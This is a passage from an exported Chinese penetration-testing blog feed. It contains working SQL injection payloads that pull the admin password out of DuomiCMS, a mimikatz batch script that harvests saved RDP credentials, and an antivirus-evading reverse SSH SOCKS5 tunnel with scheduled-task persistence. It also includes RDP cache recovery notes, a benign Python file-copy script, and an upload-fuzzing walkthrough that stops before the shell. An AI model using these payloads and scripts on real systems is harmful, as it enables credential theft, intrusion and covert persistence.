 <figure class="highlight php"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="variable">$dm</span>==<span class="string">'yq'</span>)</span><br><span class="line">{</span><br><span class="line">	<span class="variable">$ccgid</span>=<span class="variable">$_SESSION</span>[<span class="string">'duomi_user_group'</span>];</span><br><span class="line">	<span class="variable">$ccuid</span>=<span class="variable">$_SESSION</span>[<span class="string">'duomi_user_id'</span>];</span><br><span class="line">	<span class="variable">$cc1</span>=<span class="variable">$dsql</span>-&gt;<span class="title function_ invoke__">GetOne</span>(<span class="string">"select * from duomi_member_group where gid=<span class="subst">$ccgid</span>"</span>);</span><br><span class="line">	<span class="variable">$ccgroup</span>=<span class="variable">$cc1</span>[<span class="string">'gname'</span>];</span><br><span class="line">	<span class="variable">$cc2</span>=<span class="variable">$dsql</span>-&gt;<span class="title function_ invoke__">GetOne</span>(<span class="string">"select * from duomi_member where id=<span class="subst">$ccuid</span>"</span>);</span><br><span class="line">	<span class="variable">$ccjifen</span>=<span class="variable">$cc2</span>[<span class="string">'points'</span>];</span><br><span class="line">	<span class="variable">$ccemail</span>=<span class="variable">$cc2</span>[<span class="string">'email'</span>];</span><br><span class="line">	<span class="variable">$cclog</span>=<span class="variable">$cc2</span>[<span class="string">'logincount'</span>];</span><br></pre></td></tr></tbody></table></figure>
<p>$ccgid，$ccuid均无任何过滤直接带入查询，由于变量覆盖导致此处两个变量均可控制</p>
<p>该cms采用80sec通用防注入，网上公开方法即可绕过。</p>
<p>利用：来到member页面，随便注册一个用户,test,登入。</p>
 <figure class="highlight php"><table><tbody><tr><td class="code"><pre><span class="line">payload:</span><br><span class="line">http:<span class="comment">//127.0.0.1/duomicms_1.30/member/invitation.php</span></span><br><span class="line">_SESSION[duomi_user_id]=@`<span class="string">'` or updatexml(1, concat(0x7c, (select password from duomi_admin)), 3) and 1=@`'</span>`&amp;_SESSION[duomi_user_group]=<span class="number">1</span></span><br></pre></td></tr></tbody></table></figure>
<p>注出管理员密码</p>
 <span id="more"></span>
 <img src="/2016/11/01/duomiCMS/duomiCMS_01.png" class="">
</li>
<li>
<p>漏洞页面：<code>\member\share.php</code></p>
 <figure class="highlight php"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="variable">$dm</span>==<span class="string">'index'</span>)</span><br><span class="line">{</span><br><span class="line"><span class="variable">$ccgid</span>=<span class="variable">$_SESSION</span>[<span class="string">'duomi_user_group'</span>];</span><br><span class="line"><span class="variable">$ccuid</span>=<span class="variable">$_SESSION</span>[<span class="string">'duomi_user_id'</span>];</span><br><span class="line"><span class="variable">$cc1</span>=<span class="variable">$dsql</span>-&gt;<span class="title function_ invoke__">GetOne</span>(<span class="string">"select * from duomi_member_group where gid=<span class="subst">$ccgid</span>"</span>);</span><br><span class="line"><span class="variable">$ccgroup</span>=<span class="variable">$cc1</span>[<span class="string">'gname'</span>];</span><br><span class="line"><span class="variable">$cc2</span>=<span class="variable">$dsql</span>-&gt;<span class="title function_ invoke__">GetOne</span>(<span class="string">"select * from duomi_member where id=<span class="subst">$ccuid</span>"</span>);</span><br><span class="line"><span class="variable">$ccjifen</span>=<span class="variable">$cc2</span>[<span class="string">'points'</span>];</span><br><span class="line"><span class="variable">$ccemail</span>=<span class="variable">$cc2</span>[<span class="string">'email'</span>];</span><br><span class="line"><span class="variable">$cclog</span>=<span class="variable">$cc2</span>[<span class="string">'logincount'</span>];</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"</span></span><br><span class="line"><span class="string">开发中：</span></span><br><span class="line"><span class="string">"</span>;</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>
<p>$ccgid，$ccuid，同上</p>
 <figure class="highlight php"><table><tbody><tr><td class="code"><pre><span class="line">payload:</span><br><span class="line">http:<span class="comment">//127.0.0.1/duomicms_1.30/member/share.php</span></span><br><span class="line">dm=index&amp;_SESSION[duomi_user_id]=<span class="number">1</span>&amp;_SESSION[duomi_user_group]=@`<span class="string">'` or updatexml(1, concat(0x7c, (select password from duomi_admin)), 3) and 1=@`'</span>`</span><br></pre></td></tr></tbody></table></figure>
 <img src="/2016/11/01/duomiCMS/duomiCMS_02.png" class="">
</li>
<li>
<p>漏洞页面：<code>\member\exchange.php</code></p>
 <figure class="highlight php"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="variable">$dm</span>==<span class="string">'mybuy'</span>)</span><br><span class="line">{</span><br><span class="line"><span class="variable">$page</span> = <span class="variable">$_GET</span>[<span class="string">"page"</span>];</span><br><span class="line"><span class="variable">$pcount</span> = <span class="number">20</span>;</span><br><span class="line"><span class="variable">$row</span>=<span class="variable">$dsql</span>-&gt;<span class="title function_ invoke__">getOne</span>(<span class="string">"select count(id) as dd from duomi_buy where uid="</span>.<span class="variable">$uid</span>);</span><br><span class="line"><span class="variable">$rcount</span>=<span class="variable">$row</span>[<span class="string">'dd'</span>];	</span><br><span class="line"><span class="variable">$page_count</span> = <span class="title function_ invoke__">ceil</span>(<span class="variable">$rcount</span>/<span class="variable">$pcount</span>); </span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">empty</span>(<span class="variable">$_GET</span>[<span class="string">'page'</span>])||<span class="variable">$_GET</span>[<span class="string">'page'</span>]&lt;<span class="number">0</span>){ </span><br><span class="line"><span class="variable">$page</span>=<span class="number">1</span>; </span><br><span class="line">}<span class="keyword">else</span> { </span><br><span class="line"><span class="variable">$page</span>=<span class="variable">$_GET</span>[<span class="string">'page'</span>]; </span><br><span class="line">}</span><br><span class="line"><span class="variable">$select_limit</span> = <span class="variable">$pcount</span>; </span><br><span class="line"><span class="variable">$select_from</span> = (<span class="variable">$page</span> - <span class="number">1</span>) * <span class="variable">$pcount</span>.<span class="string">','</span>; </span><br><span class="line"><span class="variable">$pre_page</span> = (<span class="variable">$page</span> == <span class="number">1</span>)? <span class="number">1</span> : <span class="variable">$page</span> - <span class="number">1</span>; </span><br><span class="line"><span class="variable">$next_page</span>= (<span class="variable">$page</span> == <span class="variable">$page_count</span>)? <span class="variable">$page_count</span> : <span class="variable">$page</span> + <span class="number">1</span> ; </span><br><span class="line"><span class="variable">$dsql</span>-&gt;<span class="title function_ invoke__">setQuery</span>(<span class="string">"select * from duomi_buy where uid="</span>.<span class="variable">$uid</span>.<span class="string">" limit "</span>.(<span class="variable">$page</span>-<span class="number">1</span>)*<span class="variable">$pcount</span>.<span class="string">",<span class="subst">$pcount</span>"</span>);</span><br><span class="line"><span class="variable">$dsql</span>-&gt;<span class="title function_ invoke__">Execute</span>(<span class="string">'buylist'</span>);</span><br></pre></td></tr></tbody></table></figure>
<p>$uid，session取值，无过滤带入查询，post提交即可覆盖该变量</p>
 <figure class="highlight php"><table><tbody><tr><td class="code"><pre><span class="line">payload:</span><br><span class="line">http:<span class="comment">//127.0.0.1/duomicms_1.30/member/exchange.php</span></span><br><span class="line">_SESSION[duomi_user_id]=@`<span class="string">'` or updatexml(1, concat(0x7c, (select password from duomi_admin)), 3) and 1=@`'</span>`</span><br></pre></td></tr></tbody></table></figure>
 <img src="/2016/11/01/duomiCMS/duomiCMS_03.png" class="">
</li>
</ol>
]]></content>
      <tags>
        <tag>代码审计</tag>
      </tags>
  </entry>
  <entry>
    <title>getPass - 一键批量获取远程终端凭据密码</title>
    <url>/2018/01/18/getPass-%E4%B8%80%E9%94%AE%E6%89%B9%E9%87%8F%E8%8E%B7%E5%8F%96%E8%BF%9C%E7%A8%8B%E7%BB%88%E7%AB%AF%E5%87%AD%E6%8D%AE%E5%AF%86%E7%A0%81/</url>
    <content><![CDATA[<h1>前言</h1>
<blockquote>
<p><a href="https://mp.weixin.qq.com/s?__biz=MjM5MDkwNjA2Nw==&amp;mid=2650374152&amp;idx=2&amp;sn=53def8b9c8301d0c027cad32e8982c1a&amp;chksm=beb083b489c70aa2474210a70a15ef7d978bd1a3b29de0ead7da65261cd7bd027364a2494ea2&amp;mpshare=1&amp;scene=23&amp;srcid=12298b5FBQUycN1sXhWdm6gV#rd">【奇技淫巧】破解远程终端凭据，获取服务器密码</a></p>
</blockquote>
<p>想必大家都看了这篇文章吧，土司12月推送的，非常好的破解方式，内网中能起到相当大的作用，相信不少人已经去实践了一遍，过程之繁琐真是让我们这些人望而却步。</p>
<p>我可不想每拿到一台内网机，都要重复的去做这么复杂的操作，而且每一个凭据都要做一遍。</p>
<p>对批处理不熟，花了几天时间，写了个bat，一键批量获取。</p>
<h1>Code</h1>
<figure class="highlight bat"><table><tbody><tr><td class="code"><pre><span class="line">@<span class="built_in">echo</span> off</span><br><span class="line"><span class="built_in">setlocal</span> enabledelayedexpansion</span><br><span class="line"></span><br><span class="line"><span class="built_in">echo</span>.</span><br><span class="line"><span class="built_in">echo</span> [+] <span class="built_in">Start</span>. Code by redn3ck.</span><br><span class="line"><span class="built_in">echo</span>.</span><br><span class="line"></span><br><span class="line"><span class="built_in">set</span> flag=<span class="number">0</span>	<span class="built_in">REM</span> 判断是否存在Credentials</span><br><span class="line"><span class="keyword">for</span> /f <span class="variable">%%i</span> <span class="keyword">in</span> ('<span class="built_in">dir</span> /a/s/b c:\Users\Administrator\AppData\Local\Microsoft\Credentials') <span class="keyword">do</span> (</span><br><span class="line">	<span class="keyword">if</span> <span class="keyword">exist</span> <span class="variable">%%i</span> (</span><br><span class="line">		<span class="built_in">set</span> file=<span class="variable">%%i</span></span><br><span class="line">		<span class="built_in">set</span> flag=<span class="number">1</span></span><br><span class="line">		<span class="built_in">echo</span> <span class="variable">!file!</span></span><br><span class="line"></span><br><span class="line">		<span class="keyword">for</span> /f "delims=: tokens=<span class="number">1</span>,<span class="number">2</span>" <span class="variable">%%i</span> <span class="keyword">in</span> ('mimikatz.exe "dpapi::cred /<span class="keyword">in</span>:<span class="variable">!file!</span>" "<span class="keyword">exit</span>" ^| <span class="built_in">findstr</span> guidMasterKey') <span class="keyword">do</span> <span class="built_in">set</span> guidMasterKey=<span class="variable">%%j</span></span><br><span class="line"><span class="comment">		REM echo !guidMasterKey!</span></span><br><span class="line"></span><br><span class="line">		mimikatz "privilege::debug" "sekurlsa::dpapi" "<span class="keyword">exit</span>" &gt; MasterKey.txt</span><br><span class="line"><span class="comment">			</span></span><br><span class="line"><span class="comment">		REM findstr /n 返回行号 example: 1:       * GUID      :  {b619a08d-f4c3-408d-b733-bc89bd94ca0b}</span></span><br><span class="line">		<span class="keyword">for</span> /f "delims=:" <span class="variable">%%i</span> <span class="keyword">in</span> ('<span class="built_in">findstr</span> /n "<span class="variable">!guidMasterKey!</span>" MasterKey.txt') <span class="keyword">do</span> (</span><br><span class="line">		<span class="built_in">set</span> /a lineNum=<span class="variable">%%i</span>+<span class="number">1</span></span><br><span class="line"><span class="comment">		REM echo !lineNum!</span></span><br><span class="line">		<span class="keyword">call</span> :next</span><br><span class="line">		)</span><br><span class="line">	)</span><br><span class="line">)</span><br><span class="line">:end</span><br><span class="line"><span class="keyword">if</span> <span class="variable">!flag!</span>==<span class="number">0</span> <span class="built_in">echo</span> [-] No credentials :(</span><br><span class="line"><span class="built_in">echo</span>.</span><br><span class="line"><span class="built_in">echo</span> [+] End</span><br><span class="line"><span class="keyword">exit</span> /b	</span><br><span class="line"></span><br><span class="line">:next</span><br><span class="line"><span class="keyword">for</span> /f "skip=<span class="variable">%lineNum%</span> delims=" <span class="variable">%%i</span> <span class="keyword">in</span> ('<span class="built_in">type</span> MasterKey.txt') <span class="keyword">do</span> (</span><br><span class="line"><span class="built_in">set</span> MasterKeyTemp=<span class="variable">%%i</span></span><br><span class="line"><span class="keyword">goto</span> next2</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">:next2</span><br><span class="line"><span class="built_in">set</span> MasterKey=<span class="variable">%MasterKeyTemp:~16%</span></span><br><span class="line"><span class="comment">REM echo %MasterKey%</span></span><br><span class="line">mimikatz "dpapi::cred /<span class="keyword">in</span>:<span class="variable">%file%</span> /masterkey:<span class="variable">%MasterKey%</span>" "<span class="keyword">exit</span>" &gt; pass.txt</span><br><span class="line"><span class="built_in">findstr</span> "TargetName UserName CredentialBlob" pass.txt</span><br><span class="line"><span class="built_in">del</span> MasterKey.txt</span><br><span class="line"></span><br></pre></td></tr></tbody></table></figure>
<span id="more"></span>
<p>你只需把mimikatz和getCredentialsPass.bat放在同目录，运行bat即可一键批量获取远程终端凭据密码</p>
<img src="/2018/01/18/getPass-%E4%B8%80%E9%94%AE%E6%89%B9%E9%87%8F%E8%8E%B7%E5%8F%96%E8%BF%9C%E7%A8%8B%E7%BB%88%E7%AB%AF%E5%87%AD%E6%8D%AE%E5%AF%86%E7%A0%81/getPass.png" class="">
<h1>Reply</h1>
<p>权限问题：当然需要高权限，毕竟你要访问高权限文件</p>
<p>桌面：无需有桌面，只需有shell，重定向即可，getCredentialsPass.bat &gt;&gt; test.txt</p>
<h1>TCV</h1>
<p>tcv=1</p>
]]></content>
      <tags>
        <tag>工具</tag>
      </tags>
  </entry>
  <entry>
    <title>python - 本地文件操作</title>
    <url>/2020/09/23/python-%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E6%93%8D%E4%BD%9C/</url>
    <content><![CDATA[<h2 id="前言"><a class="header-anchor" href="#前言">¶</a>前言</h2>
<p>拿到一个本地文件操作需求，写个<code>py</code>完成<br>
水文，仅作笔记用途，再不水一年要过去了，蓝受。。香菇。。</p>
<h2 id="需求"><a class="header-anchor" href="#需求">¶</a>需求</h2>
<p>要求：解析<code>"文件信息.txt"</code>，根据解析出的<code>md5</code>值找到对应的文件，按照解析出的文件路径复制到相应的目录下。<br>
例如：解析第一行，根据第一个<code>md5</code>值<code>38C45AC1A54F65732CFE56C7BCC17A87</code>遍历当前文件夹及子文件夹找到对应的文件<code>123.exe</code>，再根据解析出的路径<code>"I_DONOT_远控"</code>复制到<code>"C:\I\DONOT\远控"</code>下。</p>
<h2 id="Code"><a class="header-anchor" href="#Code">¶</a>Code</h2>
<div class="note info"><p>阅读本篇文章能了解到：python</p></div>
<span id="more"></span>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="comment"># -*- coding: UTF-8 -*-</span></span><br><span class="line"><span class="keyword">import</span> os,hashlib,shutil</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">main</span>():</span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">'文件信息.txt'</span>, encoding=<span class="string">'utf-8-sig'</span>, mode=<span class="string">'r'</span>) <span class="keyword">as</span> inF:</span><br><span class="line">        <span class="keyword">for</span> line <span class="keyword">in</span> inF:</span><br><span class="line">            temp = line.strip().split(<span class="string">'#'</span>)[<span class="number">0</span>].split(<span class="string">'\t\t'</span>)</span><br><span class="line">            <span class="built_in">print</span>(temp)</span><br><span class="line">            _md5 = temp[<span class="number">0</span>]</span><br><span class="line">            flag = <span class="number">0</span></span><br><span class="line">            <span class="keyword">for</span> parent, dirnames, filenames <span class="keyword">in</span> os.walk(<span class="string">'.\\'</span>,topdown=<span class="literal">False</span>):</span><br><span class="line">                <span class="keyword">for</span> filename <span class="keyword">in</span> filenames:</span><br><span class="line">                    file_path = os.path.join(parent, filename)</span><br><span class="line">                    <span class="keyword">with</span> <span class="built_in">open</span>(file_path, <span class="string">'rb'</span>) <span class="keyword">as</span> fileF:</span><br><span class="line">                        md5obj = hashlib.md5()</span><br><span class="line">                        md5obj.update(fileF.read())</span><br><span class="line">                        _<span class="built_in">hash</span> = md5obj.hexdigest().upper()</span><br><span class="line">                        <span class="keyword">if</span> _md5 == _<span class="built_in">hash</span>:</span><br><span class="line">                            flag = <span class="number">1</span></span><br><span class="line">                            <span class="keyword">break</span></span><br><span class="line">                <span class="keyword">if</span> flag:</span><br><span class="line">                    <span class="keyword">break</span></span><br><span class="line">            dirFile = temp[<span class="number">2</span>].strip().split(<span class="string">'_'</span>)</span><br><span class="line">            pathTemp = <span class="string">'c:\\'</span></span><br><span class="line">            <span class="keyword">for</span> i <span class="keyword">in</span> dirFile:</span><br><span class="line">                pathTemp += i+<span class="string">'\\'</span></span><br><span class="line">                os.mkdir(pathTemp)</span><br><span class="line">            shutil.copy(file_path, pathTemp)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">    main()</span><br></pre></td></tr></tbody></table></figure>
]]></content>
      <tags>
        <tag>笔记</tag>
        <tag>python</tag>
      </tags>
  </entry>
  <entry>
    <title>ssh - 免杀socks5代理</title>
    <url>/2023/08/15/ssh-%E5%85%8D%E6%9D%80socks5%E4%BB%A3%E7%90%86/</url>
    <content><![CDATA[<h2 id="前言"><a class="header-anchor" href="#前言">¶</a>前言</h2>
<p>如今 <code>socks5</code> 代理非常多，<code>frp</code>,<code>iox</code> 等，但就是因为众所周知，导致被杀软杀的体无完肤</p>
<p>之前发过一次无参数版 <code>frp</code>，在<code>linux</code>上免杀效果还不错，win <code>defender</code>都过不去</p>
<p><code>iox</code> 自己编译能免杀一部分杀软，如卡巴个人标准版，进程类似这样 <code>avp.exe &lt;=&gt; Kaspersky</code></p>
<p>但目前遇到卡巴服务器版，或者说是数据中心版，自编译 <code>iox</code> 还是被杀，进程类似这样 <code>kavfswp.exe &lt;=&gt; Kaspersky Security for Windows Server processes</code></p>
<p>急需一种新型免杀 <code>socks5</code> 代理（也许并不新🤡）</p>
<span id="more"></span>
<h2 id="ssh-socks5"><a class="header-anchor" href="#ssh-socks5">¶</a>ssh socks5</h2>
<p>现在新版windows，win10,win11 均自带<code>ssh</code>，<code>cmd</code> 下直接输入 <code>ssh</code> 即可使用</p>
<p>ssh 命令除了登陆外还有三种代理功能：</p>
<blockquote>
<p>正向代理（-L）：相当于 iptable 的 port forwarding<br>
反向代理（-R）：相当于 frp 或者 ngrok<br>
socks5 代理（-D）：相当于 ss/ssr</p>
</blockquote>
<p>在实际环境中基本只用反向代理 <code>-R</code>，ssh 的动态转发会在远程创建一个监听端口，并且将请求到该端口的流量全部转发到本地端口上，从而实现代理的功能</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">ssh -NR 1080 user@vps</span><br></pre></td></tr></tbody></table></figure>
<blockquote>
<p>-C 请求会话间的数据压缩传递。对于网络缓慢的主机，压缩对连接有所提升。但对网络流畅的主机来说，压缩只会更糟糕。<br>
-q 静默模式。大多数警告信息将不输出。<br>
-N 明确表示不执行远程命令。仅作端口转发时比较有用</p>
</blockquote>
<p>使用上述命令后会交互输入<code>user</code>账户密码，之后会在 <code>vps</code> 上开启1080端口</p>
<p>在 <code>vps</code> 上直接借助 <code>proxychains curl cip.cc</code> 即可验证代理成功</p>
<h2 id="ssh-代理实战"><a class="header-anchor" href="#ssh-代理实战">¶</a>ssh 代理实战</h2>
<h3 id="1-交互"><a class="header-anchor" href="#1-交互">¶</a>1. 交互</h3>
<p>实战场景绝大多数都是不可交互的，所以首先需要解决的是密码交互问题</p>
<p>密码交互可以使用私钥登录解决</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">useradd -m user</span><br><span class="line">Passwd user</span><br><span class="line">ssh-keygen <span class="comment"># 生成私钥</span></span><br></pre></td></tr></tbody></table></figure>
<p>那么命令变为</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">ssh -NR 1080 user@vps -i C:\programdata\id_rsa</span><br></pre></td></tr></tbody></table></figure>
<p>本来按照原理应该是没问题的，但是win会报错，提示权限太open 😂，并且继续交互输入密码</p>
<p><img src="ssh_permission.png" alt="ssh_permission"></p>
<p>那就给她权限搞低点，linux <code>chmod 400 id_rsa</code>，但是下载回来发现还是不能用</p>
<p>查询 <code>stackoverflow</code>找到win解决方案</p>
<blockquote>
<p><a href="https://stackoverflow.com/questions/48888365/openssh-using-private-key-on-windows-unprotected-private-key-file-error">https://stackoverflow.com/questions/48888365/openssh-using-private-key-on-windows-unprotected-private-key-file-error</a></p>
</blockquote>
<p>username使用shell whoami结果完整填入</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">icacls C:\programdata\id_rsa /inheritance:r</span><br><span class="line">icacls C:\programdata\id_rsa /grant:r <span class="string">"%username%"</span>:<span class="string">"(R)"</span></span><br></pre></td></tr></tbody></table></figure>
<p><img src="icacls.png" alt="icacls"></p>
<h3 id="2-忽略检查"><a class="header-anchor" href="#2-忽略检查">¶</a>2. 忽略检查</h3>
<p>首次使用ssh连接新机器，会交互输入yes</p>
<p><img src="checking.png" alt="checking"></p>
<p>使用<code>-o StrictHostKeyChecking=no</code>不检查，则命令变为</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">ssh -NR 1080 user@vps -i C:\programdata\id_rsa -o StrictHostKeyChecking=no</span><br></pre></td></tr></tbody></table></figure>
<h3 id="3-端口开放位置"><a class="header-anchor" href="#3-端口开放位置">¶</a>3. 端口开放位置</h3>
<p>查询端口发现socks端口开放在<code>127.0.0.1</code>上</p>
<p><img src="netstat.png" alt="netstat"></p>
<p>那这样只能使用proxychains来实现代理，无法使用win <code>proxifier</code> 进行代理</p>
<p>尝试命令中加入<code>0.0.0.0</code>，并不生效</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">ssh -NR 0.0.0.0:1080 user@vps -i C:\programdata\id_rsa -o StrictHostKeyChecking=no</span><br></pre></td></tr></tbody></table></figure>
<p>修改vps配置文件解决</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">vim /etc/ssh/sshd_config</span><br><span class="line">		<span class="comment">#GatewayPorts no</span></span><br><span class="line">		GatewayPorts <span class="built_in">yes</span></span><br><span class="line">/etc/init.d/ssh restart</span><br></pre></td></tr></tbody></table></figure>
<p><img src="netstat2.png" alt="netstat2"></p>
<p>至此所有问题已全部解决，可在 <code>shell</code> 不上传程序实现 <code>socks5</code> 代理（私钥除外🙃）</p>
<h2 id="总结"><a class="header-anchor" href="#总结">¶</a>总结</h2>
<p>该方法适用于win10及其以上机器，ssh为win自带程序，实现免杀</p>
<p>可当作一个潜伏加固使用，计划任务定期反弹，但这样有一个缺点就是vps无需启动程序监听，到点会自动反弹回来，若不手动kill，程序驻留时间长，有被发现的风险</p>
<h2 id="参考链接"><a class="header-anchor" href="#参考链接">¶</a>参考链接</h2>
<blockquote>
<p><a href="https://zhuanlan.zhihu.com/p/57630633">https://zhuanlan.zhihu.com/p/57630633</a></p>
<p><a href="https://blog.csdn.net/qq_19922839/article/details/126623031">https://blog.csdn.net/qq_19922839/article/details/126623031</a></p>
</blockquote>
]]></content>
      <tags>
        <tag>免杀</tag>
        <tag>socks</tag>
        <tag>ssh</tag>
        <tag>加固</tag>
      </tags>
  </entry>
  <entry>
    <title>信息收集 - 远程桌面重现</title>
    <url>/2021/07/28/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86-%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2%E9%87%8D%E7%8E%B0/</url>
    <content><![CDATA[<h2 id="前言"><a class="header-anchor" href="#前言">¶</a>前言</h2>
<p>常规的信息收集技术就不多讲了，前两天apt32砖家东给我发来一篇文章</p>
<blockquote>
<p><a href="https://www.freebuf.com/articles/web/279561.html">https://www.freebuf.com/articles/web/279561.html</a></p>
</blockquote>
<p>我一看，牛蛙，rdp远程桌面重现，没想到信息收集还能有这种姿势，属实稀奇，于是试玩了一波</p>
<h2 id="原理"><a class="header-anchor" href="#原理">¶</a>原理</h2>
<p>文章写的很详细，我就不赘述了，大致原理就是远程桌面会有缓存，解析缓存重现rdp</p>
<h2 id="复现"><a class="header-anchor" href="#复现">¶</a>复现</h2>
<p>打开缓存目录<code>C:\Users\Administrator\AppData\Local\Microsoft\Terminal Server Client\Cache</code>，看到确实有文件</p>
<div class="note info"><p>阅读本篇文章能了解到：信息收集，工具利用</p></div>
<span id="more"></span>
<p><img src="bmc.png" alt="bmc"></p>
<p>有大佬写好了工具，直接用工具解析该文件，想知道原理的可以去看原文章</p>
<blockquote>
<p><a href="https://github.com/ANSSI-FR/bmc-tools">https://github.com/ANSSI-FR/bmc-tools</a></p>
</blockquote>
<figure class="highlight cmd"><table><tbody><tr><td class="code"><pre><span class="line">bmc-tools.py -s "C:\Users\Administrator\AppData\Local\Microsoft\Terminal Server Client\Cache" -d d:\intranet\bmc-tools</span><br></pre></td></tr></tbody></table></figure>
<p><img src="bmc-tools.png" alt="bmc-tools"><br>
提取完成，20m文件提取出2553个文件，还是蛮多的，打开看下</p>
<p><img src="bmc-tools_2.png" alt="bmc-tools_2"></p>
<h2 id="总结"><a class="header-anchor" href="#总结">¶</a>总结</h2>
<p>很新奇的一种信息收集方式，虽然用处不是那么大，但在实在无法收集到信息的时候还是可以尝试一下，属于走投无路的一种奇技淫巧，特此记录</p>
]]></content>
      <tags>
        <tag>奇技淫巧</tag>
        <tag>笔记</tag>
        <tag>信息收集</tag>
        <tag>3389</tag>
        <tag>远程桌面</tag>
      </tags>
  </entry>
  <entry>
    <title>上传 - 猜测表单参数getshell</title>
    <url>/2019/10/18/%E4%B8%8A%E4%BC%A0-%E7%8C%9C%E6%B5%8B%E8%A1%A8%E5%8D%95%E5%8F%82%E6%95%B0getshell/</url>
    <content><![CDATA[<h2 id="0x01-前言"><a class="header-anchor" href="#0x01-前言">¶</a>0x01 前言</h2>
<p>大佬给了个上传点，说是这个点足够写一篇教程了，遂尝试一下，看自己得行不。<br>
上传点如下：</p>
<blockquote>
<p><code>https://subdomain.target.com/UpLoad/UpLoad.aspx</code></p>
</blockquote>
<p>访问之，<code>302</code>跳转到<code>User_Status</code></p>
<img src="/2019/10/18/%E4%B8%8A%E4%BC%A0-%E7%8C%9C%E6%B5%8B%E8%A1%A8%E5%8D%95%E5%8F%82%E6%95%B0getshell/user_status.png" class="">
<div class="note info"><p>阅读本篇文章能了解到：<span class="label success">上传</span>, <span class="label success">getshell</span></p></div>
<span id="more"></span>
<h2 id="0x02-猜测参数"><a class="header-anchor" href="#0x02-猜测参数">¶</a>0x02 猜测参数</h2>
<p>没有任何功能点，显然是需要猜参数了，与其说是猜测不如说是构造，使用通用表单上传参数</p>
<figure class="highlight html"><table><tbody><tr><td class="code"><pre><span class="line">Content-Type: multipart/form-data; boundary=--------1036030574</span><br><span class="line"></span><br><span class="line">----------1036030574</span><br><span class="line">Content-Disposition: form-data; name="Filedata"; filename="pic.jpg"</span><br><span class="line">Content-Type: text/plain</span><br><span class="line"></span><br><span class="line">123</span><br><span class="line"></span><br><span class="line">----------1036030574--</span><br></pre></td></tr></tbody></table></figure>
<p><img src="oneForm.png" alt="oneForm"></p>
<p>显然<code>response</code>并无变化，也没有上传成功的提示，更换几个常用的<code>name</code>，<code>filename</code>后一样无果<br>
无头苍蝇般的猜测显然不行，查看源码找找有用信息<br>
并无有价值信息，进一步查看<code>js</code>，<code>jquery</code>忽略不看，直接看第二个<code>comfun.js</code></p>
<p><img src="view-source.png" alt="view-source"></p>
<p>随便翻翻，果然发现点有用的东西，函数<code>UpLoadPic</code></p>
<p><img src="comfun.js-uploadPic.png" alt="comfun.js-uploadPic"></p>
<p>直接访问<code>/UpLoad/UpLoadPic.aspx</code>，一样<code>302</code>跳转到<code>User_Status</code></p>
<p><img src="uploadPic302.png" alt="uploadPic302"></p>
<p>尝试把函数中的参数全部构造成表单提交</p>
<figure class="highlight html"><table><tbody><tr><td class="code"><pre><span class="line">----------1036030574</span><br><span class="line">Content-Disposition: form-data; name="ObjNM"; </span><br><span class="line">Content-Type: text/plain</span><br><span class="line"></span><br><span class="line">1</span><br><span class="line"></span><br><span class="line">----------1036030574</span><br><span class="line">Content-Disposition: form-data; name="FilePath"; </span><br><span class="line">Content-Type: text/plain</span><br><span class="line"></span><br><span class="line">pic.jpg</span><br><span class="line"></span><br><span class="line">----------1036030574</span><br><span class="line">Content-Disposition: form-data; name="UpLoadBtnNM"; </span><br><span class="line">Content-Type: text/plain</span><br><span class="line"></span><br><span class="line">1</span><br><span class="line"></span><br><span class="line">----------1036030574</span><br><span class="line">Content-Disposition: form-data; name="DeleteBtnNM"; </span><br><span class="line">Content-Type: text/plain</span><br><span class="line"></span><br><span class="line">1</span><br><span class="line"></span><br><span class="line">----------1036030574</span><br><span class="line">Content-Disposition: form-data; name="MaxFileSize"; </span><br><span class="line">Content-Type: text/plain</span><br><span class="line"></span><br><span class="line">1</span><br><span class="line"></span><br><span class="line">----------1036030574</span><br><span class="line">Content-Disposition: form-data; name="MaxSize"; </span><br><span class="line">Content-Type: text/plain</span><br><span class="line"></span><br><span class="line">1</span><br><span class="line"></span><br><span class="line">----------1036030574</span><br><span class="line">Content-Disposition: form-data; name="IsCover"; </span><br><span class="line">Content-Type: text/plain</span><br><span class="line"></span><br><span class="line">1</span><br><span class="line">----------1036030574--</span><br></pre></td></tr></tbody></table></figure>
<p>上传页面出现了</p>
<p><img src="uploadPic-post.png" alt="uploadPic-post"></p>
<p>果断上传<code>asp</code>，提示白名单</p>
<p><img src="uploadPic-asp.png" alt="uploadPic-asp"></p>
<p><code>iis8.0</code> 并无解析漏洞，随便试试，爆出绝对路径<code>D:\web_root\UpLoad</code>，不知是否有用，先留着</p>
<p><img src="root_path.png" alt="root_path"></p>
<p>继续<code>fuzz</code>，发现无法绕过，就连白名单的<code>jpg</code>都无法上传，经过多次<code>fuzz</code>，<code>txt</code>可上传，并返回文件名</p>
<p><img src="uploadPic-txt-1.png" alt="uploadPic-txt-1"></p>
<p>根据上述绝对路径，直接加在<code>/upload/</code>，得到相对路径</p>
<p><img src="uploadPic-txt-2.png" alt="uploadPic-txt-2"></p>
<h2 id="0x03-getshell"><a class="header-anchor" href="#0x03-getshell">¶</a>0x03 getshell</h2>
